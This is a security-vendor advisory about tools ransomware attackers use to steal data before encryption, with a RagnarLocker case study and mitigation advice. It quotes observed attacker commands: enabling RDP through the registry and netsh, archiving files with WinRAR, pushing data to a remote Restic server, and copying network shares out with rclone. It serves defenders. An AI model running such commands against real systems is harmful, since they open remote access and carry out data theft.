Data Exfiltration: Increasing Number of Tools Leveraged by Ransomware Attackers

Ransomware actors are deploying a growing array of data-exfiltration tools in their attacks and, over the past three months alone, Symantec has found attackers using at least dozen different tools capable of data exfiltration. While some exfiltration tools are malware, the vast majority are dual-use – legitimate software used by the attackers for malicious purposes. 

Double extortion attacks are now standard practice for most ransomware operators. In addition to encrypting files, attackers steal data from victims and threaten to release it unless the ransom is paid. The tactic has proven to be effective, supplying attackers with more leverage to use against organizations that may be able to restore encrypted files from backups.

The range of tools now being used by ransomware actors for exfiltration is growing. It would appear that this trend is driven by two factors: A growing awareness among attackers of the potential functionality in certain types of software; and a desire to find lesser-known alternatives to tools that have gained a reputation for malicious usage. 

While Rclone is still the most frequently used exfiltration tool by ransomware actors, the fastest growing category is remote administration and remote management tools, such as AnyDesk, ScreenConnect, and Atera. The functionality of these tools lies behind their appeal to attackers, since exfiltration is just one of their capabilities and most can act as a de-facto backdoor on a compromised computer. 

The most frequently used exfiltration tools over the past three months include:

Rclone: Open-source tool that can legitimately be used to manage content in the cloud, but has been seen being abused by ransomware actors to exfiltrate data from victim machines. For an example of how Rclone may be used, see case study below.

AnyDesk: A legitimate remote desktop application. By installing it, attackers can obtain remote access to computers on a network. Malicious usage of AnyDesk is now a well-known TTP and, in some cases, attackers will attempt to avoid raising suspicions by renaming the AnyDesk executable to something that may appear more innocuous, a technique known as masquerading.

RDP: Remote Desktop Protocol. A Microsoft-developed protocol that allows a computer to connect to and control another computer, using client/server software. Attackers can attempt to enable RDP using a variety of techniques, including leveraging multiple living-off-the-land tools. Once RDP is enabled, it allows the attackers to use any number of dual-use tools that leverage the RDP protocol. 

For example, an attacker may attempt to enable RDP by simply modifying a registry key:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

The attacker may also attempt to create a firewall rule to specifically allow all incoming RDP connections using a Network Shell (netsh) command:

netsh advfirewall firewall add rule name=[NAME] RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

Cobalt Strike: An off-the-shelf tool that can be used to execute commands, inject other processes, elevate current processes, or impersonate other processes, and upload and download files. It ostensibly has legitimate uses as a penetration-testing tool but is invariably exploited by malicious actors. Cobalt Strikes has been used for data exfiltration, with attackers leveraging Cobalt Strike's Beacon payload to establish covert communication channels with compromised systems, allowing them to exfiltrate sensitive data stealthily. The tool's ability to mimic normal network traffic and blend in with legitimate activity enables attackers to surreptitiously transfer valuable information from compromised networks.

ScreenConnect:  A remote desktop application tool by ConnectWise, used to enable remote access to computers.

Atera: Legitimate remote monitoring and access software. It and similar tools are often used by attackers to obtain remote access to computers on a network. 

WinRAR: An archive manager that can be used to archive or zip files. Attackers have used WinRAR and similar utilities (e.g. 7-Zip) in order to prepare files for exfiltration: 

cmd /u [REMOVED] CSIDL_COMMON_APPDATA\rar.exe a -dh -hp[REMOVED] -m5 CSIDL_COMMON_APPDATA\1.rar CSIDL_COMMON_APPDATA\1.txt > CSIDL_COMMON_APPDATA\log.txt

Restic: Open-source command line backup tool designed to be efficient and secure and will work with various platforms including Windows, Linux, and OSX. Restic supports various storage backends, including local directories, SFTP servers, Amazon S3, Microsoft Azure, and Google Cloud Storage, which has made it a popular choice for ransomware actors.

The following is an example of Restic commands used by attackers using the Noberus ransomware. The “init” command initializes a new repository. The “-r” switch specifies the repository to backup to or restore from, while the “-use-fs-snapshot” switch instructs the application to use the file system snapshot where possible.

CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ init [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt
CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt --use-fs-snapshot --verbose backup "CSIDL_SYSTEM_DRIVE\[REMOVED]"

TightVNC: Open-source remote desktop software.

WinSCP: A legitimate SFTP client and FTP client for Microsoft Windows.

Pandora RC: Pandora Remote control (formerly known as eHorus) is a legitimate remote access tool that is sold commercially and has agents for Windows, Linux, and Mac workstations. It has also been leveraged by attackers, mainly to facilitate remote access and deployment of additional tools to assist in credential dumping and lateral movement. However, Pandora RC may also be used to facilitate exfiltration of sensitive information from targeted organizations. The remote management platform can be used from any device with a web browser.

Chisel: Chisel is an open-source proxy tool. It was designed to create encrypted, tunnelled connections, commonly used in network security testing and penetration testing scenarios. However, it has been abused during ransomware attacks to create tunnels to attacker-controlled infrastructure as part of data exfiltration activities. It creates a TCP/UDP tunnel that is transported over HTTP and secured via SSH.

PowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance. In several ransomware attacks, the attackers have executed specific commands in order to facilitate data exfiltration, including use of the Compress-Archive cmdlet:

powershell Compress-Archive CSIDL_PROFILE\public\[REMOVED]-fs CSIDL_PROFILE\public\[REMOVED]-fs.zip

Case Study: Rclone usage in RagnarLocker attack 

Rclone is an open-source tool whose legitimate uses include online backups and managing content in the cloud. Ransomware attackers use its capabilities to exfiltrate data from compromised networks. It is usually installed by the attackers themselves once they have infiltrated a targeted network. Rclone is now so frequently used by ransomware groups that many attackers will now rename Rclone to masquerade as something else (e.g. svchost.exe).

A RagnarLocker attack which occurred in July 2023 provides an example of how Rclone can be used by ransomware actors. The first evidence of malicious activity occurred when PowerShell commands were executed to disable Local Security Authority (LSA) protection. The attackers then ran SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for the discovery of host names and network services. 

The next day, the attackers resumed their activity, deploying Mimikatz and LaZagne to dump credentials, before using a number of living-off-the-land tools to gather system information, save registry hives, execute commands on other computers on the network, and enable the Remote Desktop Protocol (RDP) to facilitate remote access. 

The attackers then began using Rclone to copy data from network shares, e.g.

rclone copy \\[REMOVED]\[REMOVED]\Shares --max-age 2095d [REMOVED]:[REMOVED]/ -P --exclude "*.{zip,log,rar,wav,mp4,mpeg}" --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6

Interestingly, there were frequent typos in the commands issued by the attackers, suggesting hands-on-keyboard activity rather than automation. 

The attackers then initiated Rclone connections to the Put.io file-sharing service, which acted as the destination for the exfiltrated data:

• https://api.put[.]io

• https://s100.put[.]io

• https://s101.put[.]io

• https://s102.put[.]io

• https://s103.put[.]io

• https://upload.put[.]io

Once the data was exfiltrated, the attackers moved on to the next stage of the attack, deployment of the RagnarLocker payload and encryption of files. 

Flying under the radar

Data exfiltration is now a key step in the attack chain for most ransomware actors and many see stolen data as their most effective way of extorting organizations, creating darknet data leak sites naming their victims and publishing stolen data if a ransom isn’t paid. While some malware is still being authored for this purpose, many attackers are turning to legitimate software packages in the belief that they are less likely to trigger alerts when deployed on their victims’ networks.

Protection

Symantec Adaptive Protection helps to close attack routes available to attackers using living-of-the-land and dual-use tools. Adaptive allows users to:

• Profile the normal behavior of trusted applications and processes in the enterprise environment.
• Analyze prevalence to get visibility into the potential impact of eliminating specific behaviors in the environment.
• Administrators can use the prevalence analysis coupled with correlated MITRE techniques to help determine which application behaviors to block. Any behaviors that are not used or seldom used can be safely blocked.

For the latest protection updates, please visit the Symantec Protection Bulletin.

Mitigation

• Monitor outbound traffic for unusual patterns and communications with external servers or cloud storage services.
• Monitor the use of dual-use tools inside your network. 
• Monitor registry and system changes made on your network.
• Ensure you are using the latest version of PowerShell to leverage enhanced logging and auditing capabilities, along with the latest security features like AppLocker.
• Restrict access to RDP Services. Only allow RDP from specific known IP addresses and ensure you are using multi-factor authentication (MFA).
• Implement proper audit and control of administrative account usage. You could also implement one-time credentials for administrative work to help prevent theft and misuse of admin credentials.
• Create profiles of usage for admin tools. Many of these tools are used by attackers to move laterally undetected through a network.
• Use application whitelisting where applicable.
• Locking down PowerShell can increase security, for example with the constrained language mode.

Indicators of Compromise

If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.